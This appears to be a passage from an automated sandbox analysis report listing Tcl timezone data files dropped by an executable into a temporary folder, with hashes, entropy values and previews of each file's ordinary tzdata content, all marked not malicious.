                                                                                                                                                                                                                                                    SHA-256:3A5DB7C2C71F95C495D0884001F82599E794118452E2748E95A7565523546A8E
                                                                                                                                                                                                                                                    SHA-512:D9F2618B153BFE4888E893A62128BE0BD59DFAFC824DA629454D5D541A9789536AC029BF73B6E9749409C522F450D53A270D302B2CF084444EA64D9138D77DFE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Oslo)]} {. LoadTimeZoneFile Europe/Oslo.}.set TZData(:Arctic/Longyearbyen) $TZData(:Europe/Oslo).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Aden

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):166
                                                                                                                                                                                                                                                    Entropy (8bit):4.7788335911117095
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8t1zVAIgNsM1E2WFK4h4WFK81S:SlSWB9IZaM3yN1zVAIgaM1E2wKs4wK8c
                                                                                                                                                                                                                                                    MD5:BBAFEA8E55A739C72E69A619C406BD5D
                                                                                                                                                                                                                                                    SHA1:0C2793114CA716C5DBAF081083DF1E137F1D0A63
                                                                                                                                                                                                                                                    SHA-256:6E69C5C3C3E1C98F24F5F523EC666B82534C9F33132A93CCC1100F27E594027F
                                                                                                                                                                                                                                                    SHA-512:7741F2281FDCA8F01A75ABEBF908F0B70320C4C026D90D4B0C283F3E2B8C47C95263569916EF83CAD40C87D5B6E714045D0B43370A263BC7BE80EC3DA62CC82F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Riyadh)]} {. LoadTimeZoneFile Asia/Riyadh.}.set TZData(:Asia/Aden) $TZData(:Asia/Riyadh).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Almaty

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1627
                                                                                                                                                                                                                                                    Entropy (8bit):3.956903784715755
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5CeyeBebweJq7eqeS7eWqeUeVerePwehe0eNNeGeIOeoe4eieV7epeGqeUeuecea:R74bxTDpWDF8C5YlNkvIH5JrQwGDFn9a
                                                                                                                                                                                                                                                    MD5:CC9C35479B78031C20B1E7BB17DBC970
                                                                                                                                                                                                                                                    SHA1:9E5D894B8B50466F2FFEA9F6AF3022BEDDE8A8CA
                                                                                                                                                                                                                                                    SHA-256:CFF6D1A1EB22F1F425C996F18427F96B3920D945A0EAF028D752A5717CC4A588
                                                                                                                                                                                                                                                    SHA-512:ADD0CF752F0B00C4894EA7A8475D3A1F01CEF3195A6F09993508BB006C1B0F74FB4AA56F0D4D6756D9BAAAB1995F89B8C75D2178284F21AA11286B5B2378FEE7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Almaty) {. {-9223372036854775808 18468 0 LMT}. {-1441170468 18000 0 ALMT}. {-1247547600 21600 0 ALMT}. {354909600 25200 1 ALMST}. {370717200 21600 0 ALMT}. {386445600 25200 1 ALMST}. {402253200 21600 0 ALMT}. {417981600 25200 1 ALMST}. {433789200 21600 0 ALMT}. {449604000 25200 1 ALMST}. {465336000 21600 0 ALMT}. {481060800 25200 1 ALMST}. {496785600 21600 0 ALMT}. {512510400 25200 1 ALMST}. {528235200 21600 0 ALMT}. {543960000 25200 1 ALMST}. {559684800 21600 0 ALMT}. {575409600 25200 1 ALMST}. {591134400 21600 0 ALMT}. {606859200 25200 1 ALMST}. {622584000 21600 0 ALMT}. {638308800 25200 1 ALMST}. {654638400 21600 0 ALMT}. {662666400 21600 0 ALMT}. {694202400 21600 0 ALMT}. {701802000 25200 1 ALMST}. {717523200 21600 0 ALMT}. {733262400 25200 1 ALMST}. {748987200 21600 0 ALMT}. {764712000 25200 1 ALMST}. {780436800 21600 0 ALMT}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Amman

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7055
                                                                                                                                                                                                                                                    Entropy (8bit):3.621680472512772
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:Rnv8A4XkyKfUN9QXCkFpej4g2uMekzdgyvwKVuKEZhfuITrar2gsq0teU:RvMw2y3p+4g2PxbLS5
                                                                                                                                                                                                                                                    MD5:703F8A37D41186AC8CDBCB86B9FE6C1B
                                                                                                                                                                                                                                                    SHA1:B2D7FCBD290DA0FEB31CD310BA29FE27A59822BE
                                                                                                                                                                                                                                                    SHA-256:847FA8211956C5930930E2D7E760B1D7F551E8CDF99817DB630222C960069EB8
                                                                                                                                                                                                                                                    SHA-512:66504E448469D2358C228966739F0FEB381BF862866A951B092A600A17DAD80E6331F6D88C4CFCE483F45E79451722A19B37291EDA75C7CD4D7E0A7E82096F47
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Amman) {. {-9223372036854775808 8624 0 LMT}. {-1230776624 7200 0 EET}. {108165600 10800 1 EEST}. {118270800 7200 0 EET}. {136591200 10800 1 EEST}. {149806800 7200 0 EET}. {168127200 10800 1 EEST}. {181342800 7200 0 EET}. {199749600 10800 1 EEST}. {215643600 7200 0 EET}. {231285600 10800 1 EEST}. {244501200 7200 0 EET}. {262735200 10800 1 EEST}. {275950800 7200 0 EET}. {481154400 10800 1 EEST}. {496962000 7200 0 EET}. {512949600 10800 1 EEST}. {528670800 7200 0 EET}. {544399200 10800 1 EEST}. {560120400 7200 0 EET}. {575848800 10800 1 EEST}. {592174800 7200 0 EET}. {610581600 10800 1 EEST}. {623624400 7200 0 EET}. {641167200 10800 1 EEST}. {655074000 7200 0 EET}. {671839200 10800 1 EEST}. {685918800 7200 0 EET}. {702856800 10800 1 EEST}. {717973200 7200 0 EET}. {733701600 10800 1 EEST}. {749422800 7200 0 EET}. {765151200 10800 1

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Anadyr

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2126
                                                                                                                                                                                                                                                    Entropy (8bit):3.9059727754043094
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:5l1wikTTFLDQg/c1l9U7z/viKX2jO61kd9Outd1rq92Eb6LqeJ3f686bzQ:71wikHFNiKX2jAwIvUs
                                                                                                                                                                                                                                                    MD5:C8D90F85B9D4DBE3D8C0C0034703A5A0
                                                                                                                                                                                                                                                    SHA1:F38B93DABD7F96EBC21F854F782709ECE7AE2867
                                                                                                                                                                                                                                                    SHA-256:89D9194E2CC512F5AD13C4081DF3BE8FEA893B97BDD2483155A88BF481397CCE
                                                                                                                                                                                                                                                    SHA-512:1B85DA900D0E34E7127E238150CE15491713C5261AA2523E049C16CDD6CAB854FB2A506AFC8B27F3D1178FEE74B997743019C973454368DBDDFA2488D2340E56
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Anadyr) {. {-9223372036854775808 42596 0 LMT}. {-1441194596 43200 0 ANAT}. {-1247572800 46800 0 ANAMMTT}. {354884400 50400 1 ANAST}. {370692000 46800 0 ANAT}. {386420400 43200 0 ANAMMTT}. {386424000 46800 1 ANAST}. {402231600 43200 0 ANAT}. {417960000 46800 1 ANAST}. {433767600 43200 0 ANAT}. {449582400 46800 1 ANAST}. {465314400 43200 0 ANAT}. {481039200 46800 1 ANAST}. {496764000 43200 0 ANAT}. {512488800 46800 1 ANAST}. {528213600 43200 0 ANAT}. {543938400 46800 1 ANAST}. {559663200 43200 0 ANAT}. {575388000 46800 1 ANAST}. {591112800 43200 0 ANAT}. {606837600 46800 1 ANAST}. {622562400 43200 0 ANAT}. {638287200 46800 1 ANAST}. {654616800 43200 0 ANAT}. {670341600 39600 0 ANAMMTT}. {670345200 43200 1 ANAST}. {686070000 39600 0 ANAT}. {695746800 43200 0 ANAMMTT}. {701780400 46800 1 ANAST}. {717501600 43200 0 ANAT}. {733240800 46800

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Aqtau

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1684
                                                                                                                                                                                                                                                    Entropy (8bit):3.971554616694357
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQJeoR910JIhf6ZZKIYOdaV2K7LOtadYOWbgqwecyXE0uU914QlLY8uaX6:5XAIhf6KINmB21aN
                                                                                                                                                                                                                                                    MD5:F57B92336C0F84BEF426E8A3D472C9B1
                                                                                                                                                                                                                                                    SHA1:3269B8E9E0593A3D40761526D737FD4FFF55F052
                                                                                                                                                                                                                                                    SHA-256:D89D07789291AA562A5080603D9D65AE3F1DE4B430737177747A8FCCFE61EC4B
                                                                                                                                                                                                                                                    SHA-512:7ED92CCA7263B4492161EC8F2E6FD91EDE70A84BA660C6A3A0FDBD6554D80B993E57419AE3842E0E29380F1EAAEEAB96633B2F1443D82008FBC160F1F98308C0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Aqtau) {. {-9223372036854775808 12064 0 LMT}. {-1441164064 14400 0 FORT}. {-1247544000 18000 0 FORT}. {-220942800 18000 0 SHET}. {370724400 21600 0 SHET}. {386445600 18000 0 SHET}. {386449200 21600 1 SHEST}. {402256800 18000 0 SHET}. {417985200 21600 1 SHEST}. {433792800 18000 0 SHET}. {449607600 21600 1 SHEST}. {465339600 18000 0 SHET}. {481064400 21600 1 SHEST}. {496789200 18000 0 SHET}. {512514000 21600 1 SHEST}. {528238800 18000 0 SHET}. {543963600 21600 1 SHEST}. {559688400 18000 0 SHET}. {575413200 21600 1 SHEST}. {591138000 18000 0 SHET}. {606862800 21600 1 SHEST}. {622587600 18000 0 SHET}. {638312400 21600 1 SHEST}. {654642000 18000 0 SHET}. {662670000 18000 0 SHET}. {692823600 18000 0 AQTT}. {701805600 21600 1 AQTST}. {717526800 18000 0 AQTT}. {733266000 21600 1 AQTST}. {748990800 18000 0 AQTT}. {764715600 21600 1 AQTST}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Aqtobe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1656
                                                                                                                                                                                                                                                    Entropy (8bit):3.8964942154031177
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQFLeAQkaIz7c7hGQERlP9oIfgy+4d6X5rfMKBvLO913bIwnzC4:5FGIz7c7hGQERpSIfB+Q6X9fDBS3b
                                                                                                                                                                                                                                                    MD5:EEF32CC834FADB107C645CC5B036298A
                                                                                                                                                                                                                                                    SHA1:770DE2AC8995F7AF012D6CD3A269FEBEE5965289
                                                                                                                                                                                                                                                    SHA-256:1732062E5FEEAE6EE22F9D31B932DB32D373C29471917BC8CA9B37F008AAA531
                                                                                                                                                                                                                                                    SHA-512:41E8E1A7947B5A9522746ACF98ED4C8DBF195ABB7F91A3F250ACFE2643F1A76B9A528FC29D6B0BFFE50AEA2865DAA2C5CC60238A23949A76B146324AE245EFEE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Aqtobe) {. {-9223372036854775808 13720 0 LMT}. {-1441165720 14400 0 AKTT}. {-1247544000 18000 0 AKTT}. {354913200 21600 1 AKTST}. {370720800 21600 0 AKTT}. {386445600 18000 0 AKTT}. {386449200 21600 1 AKTST}. {402256800 18000 0 AKTT}. {417985200 21600 1 AKTST}. {433792800 18000 0 AKTT}. {449607600 21600 1 AKTST}. {465339600 18000 0 AKTT}. {481064400 21600 1 AKTST}. {496789200 18000 0 AKTT}. {512514000 21600 1 AKTST}. {528238800 18000 0 AKTT}. {543963600 21600 1 AKTST}. {559688400 18000 0 AKTT}. {575413200 21600 1 AKTST}. {591138000 18000 0 AKTT}. {606862800 21600 1 AKTST}. {622587600 18000 0 AKTT}. {638312400 21600 1 AKTST}. {654642000 18000 0 AKTT}. {662670000 18000 0 AKTT}. {692823600 18000 0 AQTT}. {701805600 21600 1 AQTST}. {717526800 18000 0 AQTT}. {733266000 21600 1 AQTST}. {748990800 18000 0 AQTT}. {764715600 21600 1 AQTST}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Ashgabat

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):883
                                                                                                                                                                                                                                                    Entropy (8bit):4.093280687935826
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp52gZmdHRV9IDOo3sjkhWF47ZKUjfmWnmjQIyhxdtrsjmWdjDe2WZlyXToDX3A:cQgZeRHIMwhXwb1kIw6do3kToT3CPV
                                                                                                                                                                                                                                                    MD5:9E1A83332FA045AAF785B8956DE331B2
                                                                                                                                                                                                                                                    SHA1:6228E8B105D8052D64D7C9965D1624F629D5E2DD
                                                                                                                                                                                                                                                    SHA-256:D8222AEB02E04141B35FDE9CF957422E40AF7611D7814A624AD2395E7EF5799C
                                                                                                                                                                                                                                                    SHA-512:7E7BA6DDD3A79DB1C912E0898DDA22DDDD9ABE6EAE5667268BC18BD2993995598C9CDFF7104ACAC1C8A28B5BDCA90734808ED1687371693BF9922195658A3A15
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Ashgabat) {. {-9223372036854775808 14012 0 LMT}. {-1441166012 14400 0 ASHT}. {-1247544000 18000 0 ASHT}. {354913200 21600 1 ASHST}. {370720800 18000 0 ASHT}. {386449200 21600 1 ASHST}. {402256800 18000 0 ASHT}. {417985200 21600 1 ASHST}. {433792800 18000 0 ASHT}. {449607600 21600 1 ASHST}. {465339600 18000 0 ASHT}. {481064400 21600 1 ASHST}. {496789200 18000 0 ASHT}. {512514000 21600 1 ASHST}. {528238800 18000 0 ASHT}. {543963600 21600 1 ASHST}. {559688400 18000 0 ASHT}. {575413200 21600 1 ASHST}. {591138000 18000 0 ASHT}. {606862800 21600 1 ASHST}. {622587600 18000 0 ASHT}. {638312400 21600 1 ASHST}. {654642000 18000 0 ASHT}. {670366800 14400 0 ASHT}. {670370400 18000 1 ASHST}. {686095200 14400 0 ASHT}. {695772000 18000 0 TMT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Ashkhabad

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):177
                                                                                                                                                                                                                                                    Entropy (8bit):4.750782589043179
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8xEYM4DdVAIgN/ZEYvCHt2WFKUNSH+WFKYEYMvn:SlSWB9IZaM3yRhVAIgH1CHt2wKUNSewa
                                                                                                                                                                                                                                                    MD5:73E1F618FB430C503A1499E3A0298C97
                                                                                                                                                                                                                                                    SHA1:29F31A7C9992F9D9B3447FCBC878F1AF8E4BD57F
                                                                                                                                                                                                                                                    SHA-256:5917FC603270C0470D2EC416E6C85E999A52B6A384A2E1C5CFC41B29ABCA963A
                                                                                                                                                                                                                                                    SHA-512:FAE39F158A4F47B4C37277A1DC77B8524DD4287EBAD5D8E6CBB906184E6DA275A308B55051114F4CD4908B449AE3C8FD48384271E3F7106801AD765E5958B4DD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Ashgabat)]} {. LoadTimeZoneFile Asia/Ashgabat.}.set TZData(:Asia/Ashkhabad) $TZData(:Asia/Ashgabat).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Baghdad

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1643
                                                                                                                                                                                                                                                    Entropy (8bit):3.8265567749629983
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQcTe0yFHi6Uf4DUfKUfKmF7mUffcqbUfgNqcUfZUfKUfAaUfaMZUflCUfzbS/UY:5cpmpPmFrLNquvStD1XJtgCx
                                                                                                                                                                                                                                                    MD5:7A1020270EA06F2E77AC92F960A6D389
                                                                                                                                                                                                                                                    SHA1:DD47A64D16E9E95FE42650B38AAC422E011EF51F
                                                                                                                                                                                                                                                    SHA-256:C15E1710D2287D9D05D22F8F594BBFDAC8C890F84DCADB4EB833177FE4B27627
                                                                                                                                                                                                                                                    SHA-512:C654A32D668121CE4F6D041520CD588E10698DAF85BF187C2FCB97FB0982934D7C4A252A2044ED806828F5EC4713652C5F45B22B3A22073DAD9897097BD4652B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Baghdad) {. {-9223372036854775808 10660 0 LMT}. {-2524532260 10656 0 BMT}. {-1641005856 10800 0 AST}. {389048400 14400 0 ADT}. {402264000 10800 0 AST}. {417906000 14400 1 ADT}. {433800000 10800 0 AST}. {449614800 14400 1 ADT}. {465422400 10800 0 AST}. {481150800 14400 1 ADT}. {496792800 10800 0 AST}. {512517600 14400 1 ADT}. {528242400 10800 0 AST}. {543967200 14400 1 ADT}. {559692000 10800 0 AST}. {575416800 14400 1 ADT}. {591141600 10800 0 AST}. {606866400 14400 1 ADT}. {622591200 10800 0 AST}. {638316000 14400 1 ADT}. {654645600 10800 0 AST}. {670464000 14400 1 ADT}. {686275200 10800 0 AST}. {702086400 14400 1 ADT}. {717897600 10800 0 AST}. {733622400 14400 1 ADT}. {749433600 10800 0 AST}. {765158400 14400 1 ADT}. {780969600 10800 0 AST}. {796694400 14400 1 ADT}. {812505600 10800 0 AST}. {828316800 14400 1 ADT}. {844128000 1

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Bahrain

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):166
                                                                                                                                                                                                                                                    Entropy (8bit):4.732157428331905
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyq8hHVAIgNvZAvxL2WFKENUKMFB/4WFKKu:SlSWB9IZaM3yBHVAIgPAvxL2wKENUr/i
                                                                                                                                                                                                                                                    MD5:6291D60E3A30B76FEB491CB944BC2003
                                                                                                                                                                                                                                                    SHA1:3D31032CF518A712FBA49DEC42FF3D99DD468140
                                                                                                                                                                                                                                                    SHA-256:A462F83DDB0CCC41AC10E0B5B98287B4D89DA8BBBCA869CCFB81979C70613C6C
                                                                                                                                                                                                                                                    SHA-512:C62D44527EAD47D2281FF951B9CF84C297859CFDC9A497CB92A583B6012B2B9DAAE9924EF17BC6B7CD317B770FF4924D8E1E77ED2E0EBC02502530D132EDE35B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Qatar)]} {. LoadTimeZoneFile Asia/Qatar.}.set TZData(:Asia/Bahrain) $TZData(:Asia/Qatar).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Baku

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7087
                                                                                                                                                                                                                                                    Entropy (8bit):3.7112129677911785
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:7CbMFbN5FMhBnLT9Eb82WFddWqgYL2WCQotwY2hssmC1j+IqgzbiSjMAL3Bd8:7nFXFKBdEb82WFddfgYMQUwYpCuW3Bq
                                                                                                                                                                                                                                                    MD5:D5493186CFA8CBA38FEF6CB2B8D58F66
                                                                                                                                                                                                                                                    SHA1:6FE30365F3BADC12337E62387D2DC5D1590E462B
                                                                                                                                                                                                                                                    SHA-256:1442701FDDE072F3ED533586A641ECBB1EAF5930DF57C4D170910B2403678C09
                                                                                                                                                                                                                                                    SHA-512:CED2D4C1B69EF46968E81AA7BFC8177425FB63AE2B8DBEDC71A3F3A428EB7DB08AC72F240CEEC951B1A00FCD64922B104CD7A564FA7A966AA3C3BAEC75E516B5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Baku) {. {-9223372036854775808 11964 0 LMT}. {-1441163964 10800 0 BAKT}. {-405140400 14400 0 BAKT}. {354916800 18000 1 BAKST}. {370724400 14400 0 BAKT}. {386452800 18000 1 BAKST}. {402260400 14400 0 BAKT}. {417988800 18000 1 BAKST}. {433796400 14400 0 BAKT}. {449611200 18000 1 BAKST}. {465343200 14400 0 BAKT}. {481068000 18000 1 BAKST}. {496792800 14400 0 BAKT}. {512517600 18000 1 BAKST}. {528242400 14400 0 BAKT}. {543967200 18000 1 BAKST}. {559692000 14400 0 BAKT}. {575416800 18000 1 BAKST}. {591141600 14400 0 BAKT}. {606866400 18000 1 BAKST}. {622591200 14400 0 BAKT}. {638316000 18000 1 BAKST}. {654645600 14400 0 BAKT}. {670370400 14400 1 BAKST}. {683496000 14400 0 AZST}. {686098800 10800 0 AZT}. {701812800 14400 1 AZST}. {717537600 14400 0 AZT}. {820440000 14400 0 AZT}. {828234000 18000 1 AZST}. {846378000 14400 0 AZT}. {852062

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Bangkok

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):174
                                                                                                                                                                                                                                                    Entropy (8bit):4.870101193174299
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx52WFKELYOUXGm2OHB+kevXZKmrROpDvFFsQ+8EXV8GCCn:SlSWB9X52wKELPm2OHxePZ3FO1Rb+2GL
                                                                                                                                                                                                                                                    MD5:9547C9173AA853C298ECEEFD6CB66A7C
                                                                                                                                                                                                                                                    SHA1:B9A17A14F652E3C22AE9552F93F0C7F8EE5E8444
                                                                                                                                                                                                                                                    SHA-256:BE7B9D93A7EF23A2EF6CC90AB85001B66E4D37F314FFCEA0E36A4E1F625D1DDD
                                                                                                                                                                                                                                                    SHA-512:FB984DC7DA388F68437545560AF0CE0952474C72811673DCBC4EC73BFEC4E7A985F459BDB3D5EF47A83B0731D203AF1F66D8DBD13CB8B3ED6A4041E7C2165E43
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Bangkok) {. {-9223372036854775808 24124 0 LMT}. {-2840164924 24124 0 BMT}. {-1570084924 25200 0 ICT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Beirut

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7754
                                                                                                                                                                                                                                                    Entropy (8bit):3.6329631010207892
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:OnQv8iPC28v82K/w1VxDmsCZgV+f7dIWDkLDo1WlqCTpXxcKvjRQZwtPEWRTvS4y:OQjPCL5VxKWC7dIWDkLDoqphsX
                                                                                                                                                                                                                                                    MD5:2D3AE4AD36BD5F302F980EB5F1DD0E4A
                                                                                                                                                                                                                                                    SHA1:02244056D6D4EC57937D1E187CC65E8FD18F67F0
                                                                                                                                                                                                                                                    SHA-256:E9DD371FA47F8EF1BE04109F0FD3EBD9FC5E2B0A12C0630CDD20099C838CBEBB
                                                                                                                                                                                                                                                    SHA-512:2E4528254102210B8A9A2263A8A8E72774D40F57C2431C2DD6B1761CD91FB6CEA1FAD23877E1E2D86217609882F3605D7FE477B771A398F91F8D8AD3EAF90BAC
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Beirut) {. {-9223372036854775808 8520 0 LMT}. {-2840149320 7200 0 EET}. {-1570413600 10800 1 EEST}. {-1552186800 7200 0 EET}. {-1538359200 10800 1 EEST}. {-1522551600 7200 0 EET}. {-1507514400 10800 1 EEST}. {-1490583600 7200 0 EET}. {-1473645600 10800 1 EEST}. {-1460948400 7200 0 EET}. {-399866400 10800 1 EEST}. {-386650800 7200 0 EET}. {-368330400 10800 1 EEST}. {-355114800 7200 0 EET}. {-336794400 10800 1 EEST}. {-323578800 7200 0 EET}. {-305172000 10800 1 EEST}. {-291956400 7200 0 EET}. {-273636000 10800 1 EEST}. {-260420400 7200 0 EET}. {78012000 10800 1 EEST}. {86734800 7200 0 EET}. {105055200 10800 1 EEST}. {118270800 7200 0 EET}. {136591200 10800 1 EEST}. {149806800 7200 0 EET}. {168127200 10800 1 EEST}. {181342800 7200 0 EET}. {199749600 10800 1 EEST}. {212965200 7200 0 EET}. {231285600 10800 1 EEST}. {244501200 7200 0 EE

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Asia\Bishkek

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1631
